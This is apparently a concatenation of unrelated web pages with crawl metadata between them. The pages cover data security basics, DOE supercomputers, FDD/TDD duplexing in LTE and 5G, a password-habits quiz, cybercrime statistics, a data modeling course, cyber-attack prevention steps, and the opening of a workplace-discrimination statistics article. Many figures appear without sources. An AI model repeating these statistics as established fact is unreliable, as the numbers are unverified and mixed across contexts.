Read on to learn more about data security for businesses and why having a strong cybersecurity strategy is important in protecting that information.
Data security is defined as “the process of maintaining the confidentiality, integrity, and availability of an organization’s data in a manner consistent with the organization’s risk strategy” by the National Cybersecurity Center of Excellence (NCCoE), part of the National Institute of Standards and Technology (NIST).
This can happen in 3 stages: before, during, and after an incident takes place.
Before the incident: confirm that the security architecture and response plan are in place
During the incident: ensure the organization detects and responds appropriately
After the incident: verify that a plan is in place with the ability to recover effectively and efficiently
The method by which this data is stored has changed over the years as well: from the humble beginnings of handwritten documents stored inside a file cabinet, to data files on hard drives, to today’s cloud storage such as Microsoft’s OneDrive and Google’s Google Drive.
As technology has evolved, the policies and procedures were forced to keep up with cybercriminals attempting to steal sensitive data. This is now known as Data Loss Prevention.
When data was stored in paper documents, the security process started with locked file cabinets. Later, obsolete documents were shredded (an approach later upgraded to cross-cut shredding) to prevent documents from being stolen from the company garbage. At times, even the data disposal location was secured.
As technology advanced to storing data on hard drives, new ideas were needed. One of the first ideas implemented was file permissions, which allows only authorized people to view files. File encryption emerged next, which made data unintelligible without a cipher to decrypt it.
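File permissions remain the first line of defense on modern systems. On a POSIX machine, the idea can be demonstrated in a few lines (an illustrative sketch using a temporary file):

```python
import os
import stat
import tempfile

# Create a file and restrict it so only the owning user can read or write it,
# the file-system equivalent of a locked cabinet drawer.
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)  # mode 0o600: owner read/write only

mode = stat.S_IMODE(os.stat(path).st_mode)
print(oct(mode))  # 0o600
os.remove(path)
```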
As mobile technology surfaced, the adoption of biometrics, using physiological data to open or access files, increased. Most recently, cloud technology allows data to be stored at a data center via a third-party provider.
Understanding how data security works and its importance is vital for businesses in today's digital environment, regardless of size and scale.
About 52% of breaches result from a malicious attack, which carries a combined direct and indirect average cost of $4.27 million.
Besides the obvious pitfalls associated with losing critical business data, a data breach can result in many other costs, including:
Loss of production
Company trust erosion
Systems locked down with attackers demanding payment to remedy it (ransomware)
Stolen proprietary data like a blueprint or schematic that is in development or production
Possible fines for HIPAA violations for companies in the healthcare industry
Stolen company, customer, or employee data resulting in fraud or identity theft using stolen Personally Identifiable Information (PII)
Managed security services providers (MSSPs) like DOT Security offer a solution to help in all 3 stages: before, during, and after.
It begins with a Risk Audit to check a company’s current security situation. In addition to the risk audit, a Gap Analysis is often performed by compliance experts to determine if a company is still compliant with the necessary government regulations.
When both are done, cybersecurity specialists review the findings to determine the best course of action, including the protocols, software, best practices, and training necessary for your business to stay secure and protect its most valuable data, such as:
Access management to control who can access certain information
Encryption to secure who can view data and protect it during transfers and storage
Endpoint security to secure devices accessing the business network
Awareness training to help your staff understand cyberattacks and how to spot them
With the increase of attacks and data breaches occurring, it is important that company, customer, and employee data all be protected. To do this, businesses need to establish a strong cybersecurity posture that includes cybersecurity best practices, software, and employee education on the importance of data protection. | <urn:uuid:5c299947-94b7-4774-b9b4-3998230a41d6> | CC-MAIN-2022-40 | https://dotsecurity.com/insights/blog-what-is-data-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00687.warc.gz | en | 0.943203 | 878 | 2.796875 | 3 |
DOE supercomputers poised to lead next era of innovation
The Department of Energy’s supercomputers are more than simply a matter of national pride; they are an indispensable tool for technological progress and American economic competitiveness.
Over the past 20 years, our determination to maintain our nuclear weapons stockpile without testing drove the DOE to develop computers that could model nuclear processes down to tiny fractions of a second. That meant raising the processing speed of the world’s best computers by a factor of 10,000. Last year we invested $550 million into new high-performance computing (HPC) centers, bringing multiple national laboratories together to increase our computing capabilities a further five- to seven-fold.
These future computers, which are approaching the exascale, will be an entirely new breed. Whereas HPC currently describes computers capable of hundreds of petaflops (a petaflop being 10^15 floating point operations per second, or FLOPS), exascale systems will be capable of 10^18 FLOPS, three orders of magnitude beyond a petaflop-class machine.
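The scale jump is easy to make concrete with a quick calculation (taking roughly 200 petaflops as an illustrative figure for a leading system of the era; the exact number is an assumption):

```python
PETAFLOP = 10 ** 15  # floating point operations per second
EXAFLOP = 10 ** 18

current_top = 200 * PETAFLOP  # illustrative figure for a leading system

print(EXAFLOP // PETAFLOP)    # 1000: an exaflop is three orders of magnitude past a petaflop
print(EXAFLOP / current_top)  # 5.0: in the range of the 5- to 7-fold step described above
```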
These systems are not only fast, but they handle big data in an entirely new way. They open avenues for techniques in artificial intelligence, data science, and simulations that can tease out new insights, and the centers that host them are laying the groundwork for exascale systems. Such systems will be necessary to adequately understand the complexities of cancer and countless other physical processes that can be tailored to vastly improve our world. These include:
• Investigating the effect of various drugs on the heart.
• Understanding how the ocean responds to climate change.
• Exploring ways to eliminate friction in novel materials.
• Modeling nuclear explosions eliminating the need for real-world testing.
• Exploring our enormous universe in 3D.
Of course, supercomputers have long had, and continue to have, a profound impact on the world.
Consider a hospital in Kansas City, Missouri that used HPC to analyze 120 billion DNA sequences, narrowing the cause of an infant’s liver failure to two possible genetic variants; the accurate diagnosis helped save the baby’s life. Or engineers at General Motors who have used supercomputers to simulate crash tests from every angle, test seatbelt and airbag performance, and improve safety. Or, finally, a Philadelphia consortium dedicated to energy efficiency that used high-performance computing to create greener buildings by simulating thermal flows.
Exascale computing will provide capability benefits to a broad range of industries including energy production, pharmaceutical R&D, aircraft and automobile design, and many others, allowing a vast spectrum of industry to more quickly engineer superior products that could improve our nation’s competitiveness. In addition, there are considerable benefits outside of R&D that will result from meeting both the hardware and software challenges posed by HPC. These include enhancements to smaller computer systems and many types of consumer electronics, including smartphones and cameras.
The “trickle down” will affect consumers via smaller and faster devices that use less power and are fault tolerant.
But HPC’s greatest asset is its enabling of simulation (the numerical computations necessary to understand and predict the behavior of scientifically or technologically important systems) to accelerate the pace of innovation.
Simulation has allowed Cummins to build better diesel engines at lower costs, Goodyear to more rapidly design safer tires, Boeing to build more fuel-efficient aircraft, and Procter & Gamble to improve on numerous common household products.
Simulation also accelerates the progress of technologies from laboratory to application, as advanced computers allow for more precise simulations and thus more confident predictions. The best machines today are 10,000 times faster than those of 15 years ago, and the techniques of simulation for science and national security have been drastically improved over this period.
Sustaining and more widely exploiting the U.S. competitive advantage in simulation requires concerted efforts toward two distinct goals: we must continue to push the limits of hardware and software, and U.S. industry must better capture the innovation advantage that simulation offers.
Bringing such innovation to large and small firms in diverse industries, however, requires public-private partnerships to access simulation capabilities largely resident in the nation’s national laboratories and universities. We are always looking to improve and evolve these partnerships to maximize HPC’s benefit to both industry and society as a whole.
When it comes to HPC, the sky is truly the limit. The design and operation of these immense resources are necessary to both keep America competitive and overcome the most daunting scientific challenges the world has to offer. | <urn:uuid:5723261e-bef6-4f78-be6f-5b0dd1672334> | CC-MAIN-2022-40 | https://high-performance-computing.cioreview.com/cxoinsight/doe-supercomputers-poised-to-lead-next-era-of-innovation-nid-26693-cid-84.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00687.warc.gz | en | 0.919865 | 967 | 3.125 | 3 |
Frequency Division Duplex (FDD) and Time Division Duplex (TDD) are among the most fundamental concepts in all mobile networks, including 4G LTE and 5G NR. Effective use of FDD and TDD in full-duplex and half-duplex modes ensures successful two-way communication.
4G LTE and 5G NR can use both FDD (Frequency Division Duplex) and TDD (Time Division Duplex) and operate in full and half-duplex modes. The FDD and TDD support makes 4G migration easier for 3G technologies on FDD or TDD. TDD enables 5G NR to adjust uplink and downlink resources as required.
What do FDD and TDD mean for mobile networks?
The way the communication works from the mobile phone to the network (uplink) and from the network to the phone (downlink) is determined by the duplex scheme being used. The two key duplex schemes used in mobile communications are Frequency Division Duplex – FDD and Time Division Duplex – TDD. Frequency Division Duplex or FDD is when a mobile network uses two separate frequency bands from the available frequency spectrum as dedicated uplink and downlink bands. Time Division Duplex or TDD is when a mobile network uses one frequency band both for uplink and downlink but separates the communication through different timeslots. I have written a dedicated post on the difference between FDD and TDD in mobile communications and the benefits for both.
What do half-duplex and full-duplex systems mean?
In telecommunications, the systems that can accommodate two-way communication simultaneously are called full-duplex systems, whereas the systems that can facilitate communication in only one direction at a time are called half-duplex systems. Both systems can enable two-way communication.
If you have ever used a walkie-talkie, you may have noticed that communication is done only in one direction at a time. For example, if you want to talk, you usually press the “push to talk” button and speak while the person on the other side listens, and the same can be done in the other direction if the other person wants to speak. This is a typical example of duplex communication, and since the communication is in one direction at a time, it is called half-duplex. If the communication is in both directions simultaneously, it is called full-duplex.

Mobile phones and other telephone systems require that communication can take place in both directions simultaneously, or at least nearly so. As a result, mobile phones primarily use full-duplex techniques, but some of the key mobile communications technologies also use half-duplex schemes. With walkie-talkies, there is a direct connection between the two handsets, allowing them to communicate directly. Mobile phones, on the other hand, work differently: they first connect with the cellular network in order to reach other phones. Duplex schemes play a fundamental role in the connection between the mobile network and the mobile phone.
Half-Duplex and Full-Duplex FDD and TDD in 4G LTE networks
4G LTE networks support FDD and TDD, and both of these duplex schemes in LTE use OFDMA for the downlink and SC-FDMA for the uplink. This approach allows LTE to be the primary cellular technology that allows all key third-generation (3G) technologies to migrate to 4G.
LTE networks provide a 4G migration path to all key 3G technologies, including CDMA2000, and as a result, they must support 4G migration from both FDD and TDD capable 3G networks. FDD – Frequency Division Duplex requires separate frequency bands for uplink and downlink communication where the two bands are paired together and separated by a guard band. TDD – Time Division Duplex uses the same frequency band for uplink and downlink communication. The uplink and downlink are separated in the time domain, i.e., transmitted at different time intervals. LTE also uses a half-duplex version of FDD in which the base station of the mobile network can send and receive simultaneously, but the mobile phone cannot do the same.
The TDD variant of LTE, also known as TD-LTE or LTE TDD, allows mobile operators currently on TDD-based 3G networks to migrate to LTE. TD-SCDMA is a typical example of such technologies used by one of the mobile operators in China for 3G services. TD-SCDMA networks can take the LTE TDD path to migrate to 4G. Since leading 3G technologies UMTS and CDMA2000 are based on the FDD duplex scheme, LTE FDD has been the 4G migration path for these technologies.
The downlink and uplink transmissions in LTE FDD are sent in 10 milliseconds (ms) radio frames. Each frame consists of 10 subframes of 1 ms duration. Each subframe is split into two timeslots of 0.5 ms. Half of the subframes are for uplink and half for downlink in both full and half-duplex.
The downlink and uplink transmission in LTE TDD uses a radio frame of 10 milliseconds (ms). The frame consists of 10 subframes of 1 ms duration divided into two halves, each with five subframes. The subframes can be either uplink or downlink, or special subframes.
In 4G LTE networks, both FDD and TDD, the transmissions are sent in radio frames of 10 milliseconds. Each frame is then divided into ten subframes of 1-millisecond duration. Finally, each subframe is split into two timeslots, each with a duration of 0.5 milliseconds. This is where the TDD and FDD variants of LTE diverge: LTE defines two frame structure types, type 1 for FDD and type 2 for TDD.
In FDD, half of the subframes are reserved for uplink and half for downlink in both full-duplex and half-duplex. The uplink and downlink bands are separated in the frequency domain using a guard band. In TDD, each radio frame consists of two half-frames and each half-frame consists of five subframes. Subframes can be either uplink or downlink, or special subframes. Special subframes are used when switching from downlink transmission to uplink transmission. This is where the Guard Period (GP) is found, which is the TDD equivalent of a guard band to separate uplink and downlink communication. Special subframes include Downlink Pilot Timeslot (DwPTS), Uplink Pilot Timeslot (UpPTS) and Guard Period (GP).
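The timing relationships above can be captured in a small sketch. This is a toy model of the frame timing plus one standardized TD-LTE uplink-downlink pattern (configuration 1, one of several defined patterns), not a protocol implementation:

```python
FRAME_MS = 10.0
SUBFRAMES_PER_FRAME = 10
SLOTS_PER_SUBFRAME = 2

subframe_ms = FRAME_MS / SUBFRAMES_PER_FRAME  # 1.0 ms per subframe
slot_ms = subframe_ms / SLOTS_PER_SUBFRAME    # 0.5 ms per timeslot

# TD-LTE uplink-downlink configuration 1:
# D = downlink, U = uplink, S = special subframe (DwPTS + GP + UpPTS)
tdd_config_1 = ["D", "S", "U", "U", "D", "D", "S", "U", "U", "D"]

print(subframe_ms, slot_ms)     # 1.0 0.5
print(tdd_config_1.count("U"))  # 4 uplink subframes per 10 ms frame
```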
Half-Duplex and Full-Duplex FDD and TDD in 5G networks
5G NR can operate in both FDD (paired) and TDD (unpaired) using the same radio frame structure for both duplex schemes. LTE employs two distinct frame types: type 1 for FDD and type 2 for TDD. The basic radio frame structure of 5G is designed to support both half-duplex and full-duplex communication.
The fifth generation of mobile networks, 5G, uses the New Radio (NR) technology for the air interface. 5G NR networks work closely with existing LTE networks and have two modes of deployment, standalone and non-standalone. 5G NR and 4G LTE are expected to co-exist for a long time.
FDD is full-duplex, whereas TDD and the half-duplex version of FDD are half-duplex systems. While TDD does not technically enable simultaneous communication in both directions (hence half-duplex), it alternates between the two directions quickly enough to emulate a full-duplex experience. As a result, you will likely come across documentation suggesting that both TDD and FDD are full-duplex.
To deal with changing data needs, the higher frequency bands can benefit from TDD by dynamically changing the uplink/downlink resource allocation depending on customer demand. It is also more pragmatic to use TDD for higher frequency bands because those bands are mainly beneficial for deployments in smaller areas such as factories, shopping malls, etc. That way, frequency interference is less of an issue because fewer base stations and devices need to be planned for. Since 5G NR networks can operate in considerably higher frequency bands (both licensed and unlicensed) than earlier technologies, TDD can be very effective for some of the futuristic use cases of 5G.
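The dynamic-allocation idea can be illustrated with a toy scheduler that splits a frame's subframes in proportion to offered traffic. This is purely illustrative; real 3GPP scheduling is far more involved:

```python
def split_slots(total_slots, dl_demand, ul_demand):
    """Split a frame's slots between downlink and uplink in proportion
    to offered traffic, keeping at least one slot in each direction."""
    if dl_demand <= 0 and ul_demand <= 0:
        return total_slots // 2, total_slots - total_slots // 2
    dl = round(total_slots * dl_demand / (dl_demand + ul_demand))
    dl = max(1, min(total_slots - 1, dl))  # never starve either direction
    return dl, total_slots - dl

print(split_slots(10, dl_demand=8, ul_demand=2))  # (8, 2): downlink-heavy traffic
print(split_slots(10, dl_demand=1, ul_demand=1))  # (5, 5): balanced traffic
```

With FDD's fixed paired bands, this kind of reallocation is not possible, which is why TDD is attractive where traffic is bursty and asymmetric.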
4G LTE networks employ both Frequency Division Duplex (FDD) and Time Division Duplex (TDD) to provide a backwards-compatible 4G migration path to all key 3G technologies. 5G NR networks also support both FDD and TDD. Since most futuristic use cases of 5G NR operate at higher frequency bands, TDD is expected to help by offering the flexibility to dynamically adjust downlink/uplink network resources depending on the data needs. Both 4G and 5G support full-duplex and half-duplex modes.
Here are some helpful downloads
Thank you for reading this post. I hope it helped you in developing a better understanding of cellular networks. Sometimes, we need extra support, especially when preparing for a new job, studying a new topic, or buying a new phone. Whatever you are trying to do, here are some downloads that can help you:
Students & fresh graduates: If you are just starting, the complexity of the cellular industry can be a bit overwhelming. But don’t worry, I have created this FREE ebook so you can familiarise yourself with the basics like 3G, 4G etc. As a next step, check out the latest edition of the same ebook with more details on 4G & 5G networks with diagrams. You can then read Mobile Networks Made Easy, which explains the network nodes, e.g., BTS, MSC, GGSN etc.
Professionals: If you are an experienced professional but new to mobile communications, it may seem hard to compete with someone who has a decade of experience in the cellular industry. But not everyone who works in this industry is always up to date on the bigger picture and the challenges considering how quickly the industry evolves. The bigger picture comes from experience, which is why I’ve carefully put together a few slides to get you started in no time. So if you work in sales, marketing, product, project or any other area of business where you need a high-level view, Introduction to Mobile Communications can give you a quick start. Also, here are some templates to help you prepare your own slides on the product overview and product roadmap. | <urn:uuid:509aff73-4a98-4746-8012-129e23fdaee4> | CC-MAIN-2022-40 | https://commsbrief.com/half-duplex-and-full-duplex-fdd-and-tdd-in-4g-lte-and-5g-nr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00687.warc.gz | en | 0.922155 | 2,233 | 3.609375 | 4 |
At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.
The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.
Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.
So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!
Password Quiz – Answer “Yes” or “No”
- Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
- You don’t repeat passwords.
- Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
- You change default passwords on devices to something hard to guess.
- You routinely lock your phone and devices with a passcode or fingerprint.
- You don’t share your passwords with people you’re dating or friends.
- You use a password manager.
- If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
- You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
- You make sure no one is watching when you type in your passwords.
- You try to make your passwords memorable by including phrases that have meaning to you.
- You use multi-factor authentication.
Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.
You’re a Password Pro!
You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.
You’re a Passable Passworder
You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!
You’re a Hacker’s Helper
Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.
Key Tips to Become a Password Pro:
- Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself.Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
- Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only know to you, such as the fist letter in each word of a sentence in your favorite book.
- Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security softwarethat can detect and stop known threats, help you browse safely, and protect you from identity theft.
For more great password tips, go here.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:233a4790-77d5-44d1-ade9-88b49af2200d> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/internet-security/what-your-password-says-about-you/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00687.warc.gz | en | 0.931742 | 1,121 | 2.75 | 3 |
What if Street Crime Statistics Matched Those of Cybercrime?
If street crime statistics matched those of cybercrime, our world would resemble the Wild West.
Almost 60 million Americans said they were affected by cyber identity theft in 2018. That's one in every 5.4 citizens. FBI statistics show that over 282,000 robberies (thefts) were recorded in the United States during the same period - one for roughly every 1,160 citizens. In other words, you are over 200 times more likely to be a victim of cyber theft than 'traditional' robbery. On a broader level, robberies are included in the FBI’s list of violent crimes, the victims of which number 1.2 million, or around one in every 270 citizens (as opposed to every 5.4).
A further stat shows that "more than 446 million consumer records containing personal information were exposed in data breaches in 2018". A lot of wallets/passports/ID cards need to be stolen to get the same amount of information.
In 2018, the average dollar value of property stolen per reported robbery was $2,119. One set of figures puts the average ransomware payment at over 17 times this amount ($36,295), almost dollar-for-dollar the same amount paid for the average price of a light vehicle in the US ($36,843).
Corporate cybercrime stats are just as disturbing and a business/organisation somewhere in the world is predicted to suffer a ransomware attack every 14 seconds during 2019 (down to 11 seconds by 2021). And it's not only businesses. Cities are becoming the target of hackers, such as Florida's Riviera Beach, Baltimore and the combined attack on 23 towns in Texas. The number of US cities attacked rose from 38 in 2017 to 53 in 2018, and that number is expected to rise with each passing year. Imagine the reaction if armed intruders stormed the city hall of a different US city each week for a year and held that city to ransom.
Gaining physical access to many businesses these days involves security on many levels in order to prevent just anyone from getting past the front door. However, our attitude towards workplace cybercrime prevention can resemble an 'open door' policy, with 66% of cyber breaches caused by employee negligence and malicious acts. It also doesn't help that IT departments are being ignored. One study of 3,000 workers around the world showed that 46% access personal documents on their work device without IT's permission, while a further 41% download professional software and applications. And even though 93% of executives know this behaviour causes issues, 57% have accessed software and apps without IT's knowledge.
THE COST OF CYBERCRIME
Some of the world's biggest 'traditional' heists and robberies netted spoils that soared into the hundreds of millions of dollars, with one - the Central Bank of Iraq 'heist' in 2003 - exceeding $1.3 billion in today's money. In comparison, the 'revenue' of cybercrime is stratospheric and some (global) figures for 2018 go as high as $1.5 trillion. If this is the case and cybercrime was a country, it would have the 13th highest GDP in the world.
Even conservative estimates for annual cybercrime revenue, like the $600 billion - which would have a 'country GDP' ranking of around 21 - figure from the Center for Strategic and International Studies, far exceeds anything achieved pre-cyber. One of the most notorious band of cyber thieves - those behind the Gandcrab ransomware - announced their intention to retire in May, 2019, after stealing in excess of $2 billion. Part of their farewell statement read: "We are a living proof that you can do evil and get off scot-free. We are getting a well-deserved retirement."
Nearly all the perpetrators behind the biggest traditional heists have been caught. Cybercrime, on the other hand, is a faceless crime. There is an attacker - someone (or more) to blame - but they are out of sight and rarely caught, usually because they are behind a computer outside the legal jurisdiction where the crime has occurred. Even when evidence has been gathered, there is often no way to arrest the person/s involved because some countries won't participate in reciprocal legal - extradition - agreements.
Countries that refuse to have reciprocal agreements often do so for their own good reason and this is where the Pandora's box that is state-sponsored cybercrime (attack/warfare/terrorism) is opened. Everyone does it and some (you choose which) spring to mind moreso than others. Many say it all began with what is referred to as the world's 'first digital weapon': Stuxnet. Countries have been cyber-attacking one another since the internet first appeared, but Stuxnet took cybercrime (warfare) to new heights, and countries have been conducting tit-for-tat attacks on each other ever since, while doing their utmost to protect the identity of those working on their behalf.
WHO IS ACCOUNTABLE?
Cybercrime victims around the world are much the same. Statistically, they are consumers who use numerous devices and are likely to use the same password across their accounts, or share this info with others. However, even after an attack, around a quarter of US cybercrime victims still use the same online password and 60% share their passwords with others for at least one device or account (if someone breaks into your house, you change the locks and don't hand out your keypad details to every Tom, Dick and Harriet). Despite this, nearly 40% of victims believe they can protect their data from future attack and 33% believed they would be a low risk of becoming a cybercrime victim again.
These beliefs show that, despite the increasing regularity of cyber attacks, many people think "it won't happen to me" and avoid taking the most basic cyber security precautions such as changing passwords. Perhaps it's because cybercrime happens 'out there' and we aren't physically or, for the most part, psychologically violated like 'old school' robbery. If your data is stolen, it is often done so with thousands, or millions, of others. What are the odds of you being singled out and compromised?
Often it is a mere annoyance. Even 'yours truly' was the victim of an online tax office scam that saw personal data handed over in a distracted moment. The error of my ways were realised within seconds of hitting 'Send' and the relevant organisations were contacted immediately and details updated/changed. Nothing more came of it. Life went on.
Of course, this isn't always the case. However, stats show that, amidst all this cybercrime from outside sources, we should take a good look at ourselves. Over 80% of US adults believe cybercrime should be treated as a criminal act, yet nearly 25% believe stealing information online is not as bad as stealing property in real life. A further 41% believe it's acceptable to commit "morally questionable behaviour" in certain instances, such as reading someone's emails (28%), using a false email or someone else's email to identify their self online (20%) and even accessing someone's financial accounts without their permission (18%).
Cybercrime stories on a global scale and with big statistics – WannaCry infected 300,000 computers across 150 countries, with damage reaching into the billions of dollars – fill the headlines and news bulletins. We are shocked at the scale of these but, once the furore dies down and the next big story in our 24/7 news cycle takes over, we move on. These stories are usually portrayed by a shadowy - sinister, even - figure hunched over a laptop in a darkened room. Such imagery might make us feel vulnerable, but are we becoming increasingly immune to cybercrime with each passing story, just as we've become immune to all but the most graphic street crime stories? The answer is, inevitably, yes.
. . .
If you want to stay notified of vulnerabilities that affect you, register for a weekly security report customised to your stack. | <urn:uuid:7c024ecf-220a-47b9-b5e8-d913758fa8d0> | CC-MAIN-2022-40 | https://secalerts.co/article/what-if-street-crime-statistics-matched-those-of-cybercrime/bcc857ea | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00687.warc.gz | en | 0.96345 | 1,658 | 2.5625 | 3 |
Maxtrain.com - [email protected] - 513-322-8888 - 866-595-6863
The methodologies discussed are applicable to any relational database environment, including IBM DB2, the Oracle database, Microsoft SQL Server, the open-source MySQL and PostgreSQL databases as well as other RDBMS platforms. They are also applicable to other database technologies, such as object databases and legacy IMS and IDMS databases. Finally, while we use the free Oracle SQL Developer Data Modeler product as a demonstration modeling tool, one can complete the exercises of this course and apply the techniques learned using any other popular data model diagramming tool, such as IBM InfoSphere Data Architect, CA ErWin Data Modeler, Embarcadero ER/Studio and others.
In the workshop exercises you will build an increasingly complex series of data models, and will critique and correct other models. A summary of the detailed objectives of this textbook are:
• A review of model-based design, including process modeling, physical data modeling and other modeling techniques which relate to logical data modeling.
• A comparison of data modeling concepts and theories, including top-down data modeling, bottom-up data modeling, data normalization, object-oriented and semantic modeling.
• Hints, tips and guidelines in identifying entities, attributes and relationships which should appear within a data model.
• Review the popular commercial data modeling tools commonly in use today.
• The benefits of building a conceptual data model in advance of the logical model.
• Learn to find and fix well-known mistakes which can exist in relationship definitions, finding missing attributes and correcting erroneous attribute definitions.
• Review a recommended strategy for unique identifiers.
• Using semantic modeling constructs and techniques such as supertypes, subtypes, generalization, specialization, constraints, lattices and arcs.
• Using object-oriented modeling techniques such as domains, attribute classes, extended types and abstraction of attributes.
• Time-dependency and state-dependency within a data model.
• Explore classic structures and modeling patterns, including many-to-many recursion.
• Steps and available options for engineering a physical data model from a logical model.
• Reverse engineering and forward engineering of a physical data model into an implementation relational database.
No mandatory prerequisites exist for this course. However a basic knowledge of computer systems, business systems requirements and database technologies is helpful.
The primary target audiences for this course are:
3 Days Course | <urn:uuid:d45b1125-e365-48dd-9494-168ce8390a47> | CC-MAIN-2022-40 | https://maxtrain.com/product/data-modeling-workshop/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00687.warc.gz | en | 0.866474 | 512 | 2.6875 | 3 |
7 Steps Businesses Can Take to Prevent Cyber Attacks
While organizations continue their full-scale integration within the digital world, hackers are targeting companies that aren’t fully secure. As a result, $2.9 million is lost every minute due to cyber crime, and your customers are relying on you to have an impenetrable defense against it.
With cyber attacks increasing 300% since the start of the pandemic, it’s vital for businesses to analyze their vulnerabilities to prevent a crisis. Knowing the tools and practices used by hackers is important in taking preventative measures.
Common Types of Cyber Attacks:
- Phishing: 22% of cyber attacks
- Malware: 94% delivered by email
- Distributed Denial of Service (DDos): Will increase to more than 15 million attacks in a few years
By 2025, damage done by cyber attacks could hit more than $10 trillion globally.
Industries often targeted:
- Healthcare: More than 90% of companies have had a cyber attack
- Finance: Average cost of a cyber attack is $5 million
- Government: Nearly $20 billion went to a cyber security budget in 2021
Here are 7 steps you can take to prevent cyber attacks on your protected data:
- 50% of Americans don’t know what to do in the event of a cyber attack.
- Non-technical employees are the first line of defense. They need to be trained in cyber security awareness and where to look for vulnerabilities.
- Train a human firewall. This is a group of employees tasked with defending company data, to fill the gaps where a security system might be curtailed.
- 50% of companies increased their security after conducting Red & Blue Team exercises.
- Red Teams perform penetration tests to pinpoint weaknesses and vulnerabilities. In 2020, 97% of companies using penetration testing said it was important to security.
- Blue Teams are responsible for threat hunting, digital forensics, and crisis handling.In a survey conducted by Exabeam, 96% of companies reported they are performing blue team tests.
- Firewalls ensure protection of a network by blocking unauthorized traffic to sensitive information.
- By acting as a filter between networks and logging malicious traffic, firewalls help prevent breaches.
- The chance of a cyber attack increases by 65% when you don't have firewall protection.
- In 2019, businesses were facing ransomware attacks every 14 seconds.
- 60% of businesses affected by data loss shutdown less than six months later.
- Cloud data backup ensures a cost-effective, more robust measure to protect data.
- 95% of security breaches are a result of human error.
- Not all employees should have equal access to sensitive data.
- 66% of people said they use the same password on a variety of accounts.
- Using the same password across multiple platforms leads to increased vulnerability.
- New passwords should be created and updated frequently.
- Giving everyone their own account ensures less access points.
- Only give employees access to files that pertain to their job. | <urn:uuid:f948db3a-1a57-4331-b80f-010e9654c0a5> | CC-MAIN-2022-40 | https://ine.com/blog/7-steps-businesses-can-take-to-prevent-cyber-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.943583 | 630 | 2.59375 | 3 |
Workplace discrimination statistics have been in the spotlight during the past decade. Title VII of the Civil Rights Act of 1964 protects workers from employment discrimination based on age, gender, race, religion, disability, or national origin.

Employers with 15 or more employees aren't allowed to use any of these characteristics as a reason to mistreat people, pay them less, fire them, or avoid hiring them.

Despite this Act's seriousness, people worldwide are still discriminated against and harassed based on the categories specified above. In fact, race and sexual orientation are among the most common drivers of discrimination.
Let’s take a look at some of the more severe types of discrimination in the workplace:
8 Discrimination in the Workplace Statistics That Might Make You Uncomfortable (Editor’s Choice)
- 42% of US women have faced gender-related discrimination in their careers.
- 42% of US employees confirm they have faced or witnessed workplace racism and sexism.
- The average settlement for EEOC claims on religious discrimination is around $40,000–$50,000.
- Disabled employees earn about $9,000 less per year than non-disabled employees.
- 48 states have enforced equal pay laws, regardless of the employees’ gender.
- Only 26 states see progress in hiring people with disabilities.
- 25% of Black job applicants receive callbacks for whitened resumes.
- Over 20% of employees have faced age-related discrimination in the workplace.
Gender Discrimination in the Workplace Statistics
Gender discrimination in the workplace means that an employee or an applicant is treated differently or less politely because of their gender. That includes hiring bias (not being hired), being paid less or evaluated more harshly, being passed over for a promotion or training opportunities, and much more.
